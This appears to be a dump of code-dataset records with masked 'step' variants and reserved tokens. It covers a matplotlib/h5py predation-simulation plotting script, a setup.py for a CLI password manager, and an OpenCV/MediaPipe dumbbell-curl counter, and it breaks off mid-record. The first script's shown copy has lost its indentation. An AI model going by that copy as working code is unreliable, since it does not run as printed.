if os.getcwd().rfind('share') > 0:
topsy = True
import matplotlib as mpl
mpl.use('Agg')
else:
topsy = False
from matplotlib import rc
import matplotlib.pyplot as plt
from matplotlib import rc
from matplotlib import cm
from scipy.optimize import curve_fit
import sys
import h5py
from glob import glob
pwd = os.getcwd()
k = int(pwd[pwd.rfind('pred')+4:])
number_of_lines = len(glob('group*[0-9]*'))
cm_subsection = np.linspace(0., 1., number_of_lines)
colors = [ cm.magma(x) for x in cm_subsection]
Z = [[0,0],[0,0]]
levels = range(5,500+5,5)
CS3 = plt.contourf(Z, levels, cmap='magma')
plt.clf()
area = []
def movingaverage(interval, window_size):
window= np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'same')
j = 0
for group in sorted(glob('group*[0-9]*')):
files = glob(group + '/data*.h5')
print group
alive = []
time = []
plotPeriod = 0.1
for dFile in files:
value = dFile[dFile.rfind('-')+1:dFile.rfind('.')]
data = dict()
h5f = h5py.File(dFile,'r')
itime = np.copy(h5f['itime'])[0]
data['alive'] = np.copy(h5f['alive'])
data['t'] = np.copy(h5f['t'])
lastPlot = 0
for i in range(itime):
if data['t'][i] - lastPlot > plotPeriod:
time.append(data['t'][i])
alive.append(data['alive'][i].sum())
lastPlot = data['t'][i]
alive = np.array(alive).reshape(len(alive), 1)
time = np.array(time).reshape(len(time), 1)
data = np.append(time, alive, axis = 1)
data = data.tolist()
data2 = sorted(data, key=lambda x : x[0])
data2 = np.array(data2)
if np.shape(data2)[0] > 0:
y_av = movingaverage(data2[:,1], 75)
plt.plot(data2[:,0][100:-50], y_av[100:-50], label = group, color = colors[j])
trap = np.trapz(y_av[100:-50], x = data2[:,0][100:-50])
area += [[int(group[5:]), trap]]
j +=1
plt.colorbar(CS3)
plt.xlabel('Time', fontsize = 18)
plt.ylabel('$N(t)$', fontsize = 18)
plt.savefig('./groupPredation')
np.save('./area.npy', area)
area = np.array(area)
plt.plot(area[:,0], area[:,1], lw = 2)
y_av = movingaverage(area[:,1], 3)
plt.plot(area[:,0][5:-5], y_av[5:-5], lw = 2)
plt.xlabel('Group Size', fontsize = 18)
plt.ylabel('Area', fontsize = 18)
plt.savefig('./groupPredationArea.png')
|
normal
|
{
"blob_id": "2539411c7b348662dbe9ebf87e26faacc20f4c5e",
"index": 3837,
"step-1": "import numpy as np\nimport math\nimport os\nif os.getcwd().rfind('share') > 0:\n\ttopsy = True\n\timport matplotlib as mpl\n\tmpl.use('Agg')\nelse:\n\ttopsy = False\n\tfrom matplotlib import rc\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom scipy.optimize import curve_fit\nimport sys\nimport h5py\nfrom glob import glob\n\npwd = os.getcwd()\nk = int(pwd[pwd.rfind('pred')+4:])\n\nnumber_of_lines = len(glob('group*[0-9]*'))\ncm_subsection = np.linspace(0., 1., number_of_lines)\ncolors = [ cm.magma(x) for x in cm_subsection]\n\nZ = [[0,0],[0,0]]\nlevels = range(5,500+5,5)\nCS3 = plt.contourf(Z, levels, cmap='magma')\nplt.clf()\n\narea = []\n\ndef movingaverage(interval, window_size):\n window= np.ones(int(window_size))/float(window_size)\n return np.convolve(interval, window, 'same')\n\nj = 0\nfor group in sorted(glob('group*[0-9]*')):\n\tfiles = glob(group + '/data*.h5')\n\tprint group\n\n\talive = []\n\ttime = []\n\tplotPeriod = 0.1\n\n\tfor dFile in files:\n\t\tvalue = dFile[dFile.rfind('-')+1:dFile.rfind('.')]\n\n\t\tdata = dict()\n\t\th5f = h5py.File(dFile,'r')\n\t\titime = np.copy(h5f['itime'])[0]\n\t\tdata['alive'] = np.copy(h5f['alive'])\n\t\tdata['t'] = np.copy(h5f['t'])\n\n\t\tlastPlot = 0\n\t\tfor i in range(itime):\n\t\t\tif data['t'][i] - lastPlot > plotPeriod:\n\t\t\t\ttime.append(data['t'][i])\n\t\t\t\talive.append(data['alive'][i].sum())\n\t\t\t\tlastPlot = data['t'][i]\n\n\n\talive = np.array(alive).reshape(len(alive), 1)\n\ttime = np.array(time).reshape(len(time), 1)\n\n\tdata = np.append(time, alive, axis = 1)\n\tdata = data.tolist()\n\tdata2 = sorted(data, key=lambda x : x[0])\n\tdata2 = np.array(data2)\n\n\tif np.shape(data2)[0] > 0:\n\t\ty_av = movingaverage(data2[:,1], 75)\n\t\tplt.plot(data2[:,0][100:-50], y_av[100:-50], label = group, color = colors[j])\n\n\ttrap = np.trapz(y_av[100:-50], x = data2[:,0][100:-50])\n\tarea += [[int(group[5:]), trap]]\n\tj +=1\nplt.colorbar(CS3)\nplt.xlabel('Time', fontsize = 18)\nplt.ylabel('$N(t)$', fontsize = 18)\nplt.savefig('./groupPredation')\n\n\nnp.save('./area.npy', area)\narea = np.array(area)\nplt.plot(area[:,0], area[:,1], lw = 2)\ny_av = movingaverage(area[:,1], 3)\nplt.plot(area[:,0][5:-5], y_av[5:-5], lw = 2)\nplt.xlabel('Group Size', fontsize = 18)\nplt.ylabel('Area', fontsize = 18)\nplt.savefig('./groupPredationArea.png')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- encoding:utf-8 -*-
from setuptools import setup, find_packages
setup(
name='pass-manager',
version='1.2.0',
author='petitviolet',
author_email='[email protected]',
packages=find_packages(),
description = 'Simple CLI Password Manager',
long_description = 'Please show help (pass-manager -h)',
url = 'https://github.com/petitviolet/pass-manager',
license = 'MIT',
# scripts = ['src/pass_manager.py'],
platforms = ['Mac OS X'],
# platforms = ['POSIX', 'Windows', 'Mac OS X'],
entry_points={
'console_scripts': 'pass-manager = src.pass_manager:main'
},
zip_safe=False,
install_requires = ['crypto'],
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
]
)
|
normal
|
{
"blob_id": "31664f1cc808ccc0dad230e2b955692c7ae12db1",
"index": 1792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='pass-manager', version='1.2.0', author='petitviolet',\n author_email='[email protected]', packages=find_packages(),\n description='Simple CLI Password Manager', long_description=\n 'Please show help (pass-manager -h)', url=\n 'https://github.com/petitviolet/pass-manager', license='MIT', platforms\n =['Mac OS X'], entry_points={'console_scripts':\n 'pass-manager = src.pass_manager:main'}, zip_safe=False,\n install_requires=['crypto'], classifiers=['Environment :: Console',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python', 'Topic :: Utilities'])\n",
"step-3": "from setuptools import setup, find_packages\nsetup(name='pass-manager', version='1.2.0', author='petitviolet',\n author_email='[email protected]', packages=find_packages(),\n description='Simple CLI Password Manager', long_description=\n 'Please show help (pass-manager -h)', url=\n 'https://github.com/petitviolet/pass-manager', license='MIT', platforms\n =['Mac OS X'], entry_points={'console_scripts':\n 'pass-manager = src.pass_manager:main'}, zip_safe=False,\n install_requires=['crypto'], classifiers=['Environment :: Console',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python', 'Topic :: Utilities'])\n",
"step-4": "# -*- encoding:utf-8 -*-\nfrom setuptools import setup, find_packages\n\nsetup(\n name='pass-manager',\n version='1.2.0',\n author='petitviolet',\n author_email='[email protected]',\n packages=find_packages(),\n description = 'Simple CLI Password Manager',\n long_description = 'Please show help (pass-manager -h)',\n url = 'https://github.com/petitviolet/pass-manager',\n license = 'MIT',\n # scripts = ['src/pass_manager.py'],\n platforms = ['Mac OS X'],\n # platforms = ['POSIX', 'Windows', 'Mac OS X'],\n entry_points={\n 'console_scripts': 'pass-manager = src.pass_manager:main'\n },\n zip_safe=False,\n install_requires = ['crypto'],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'\n ]\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
<|reserved_special_token_0|>
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import cv2
import mediapipe as mp
import base
import math
import numpy as np
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Counts number of dumbbell curls in the video
import cv2
import mediapipe as mp
import base
import math
import numpy as np
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody = False, smooth=True, detectConf=.5, trackConf=.5,
outFile="output.mp4", outWidth=720, outHeight=1280):
super().__init__(mode, upperBody, smooth, detectConf, trackConf, outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1,y1 = self.lms[p1][1:]
x2,y2 = self.lms[p2][1:]
x3,y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3-y2,x3-x2) - math.atan2(y1-y2,x1-x2))
if angle<0:
angle += 360
if draw:
cv2.line(img, (x1,y1), (x2,y2), (255,255,255) ,2)
cv2.line(img, (x3,y3), (x2,y2), (255,255,255) ,2)
cv2.circle(img, (x1,y1), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x1,y1), 12, (0,0,255), 2)
cv2.circle(img, (x2,y2), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x2,y2), 12, (0,0,255), 2)
cv2.circle(img, (x3,y3), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x3,y3), 12, (0,0,255), 2)
cv2.putText(img, str(int(angle)), (x2-40,y2+50), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210,320), (0,100))
color = (0,255,0)
if perc > 95:
color = (0,0,255)
if self.dir == 0:
self.count += .5
self.dir = 1
if perc == 0:
color = (255,0,0)
if self.dir == 1:
self.count += .5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30,120), cv2.FONT_HERSHEY_PLAIN, 9, (255,0,0), 4)
bar = np.interp(perc, (0,100), (800,200))
cv2.rectangle(img, (50,200), (100,800), color, 3)
cv2.rectangle(img, (50,int(bar)), (100,800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30,870), cv2.FONT_HERSHEY_PLAIN, 4, (255,0,0), 4)
def main():
cap = cv2.VideoCapture("media/1.mp4")
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms)>28:
estimator.countReps(img,11,13,15)
# estimator.writeFrame(img)
cv2.imshow("Correct Pose Estimation", img)
if cv2.waitKey(1) & 0xFF == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "4a886437727ed6b48206e12b686a59a1d2a1c489",
"index": 4948,
"step-1": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n <mask token>\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\ndef main():\n cap = cv2.VideoCapture('media/1.mp4')\n estimator = PoseEstimator()\n while True:\n _, img = cap.read()\n img = cv2.resize(img, (720, 1280))\n img = estimator.findPose(img)\n lms = estimator.findPosition(img, draw=False)\n if len(lms) > 28:\n estimator.countReps(img, 11, 13, 15)\n cv2.imshow('Correct Pose Estimation', img)\n if cv2.waitKey(1) & 255 == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cv2\nimport mediapipe as mp\nimport base\nimport math\nimport numpy as np\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), 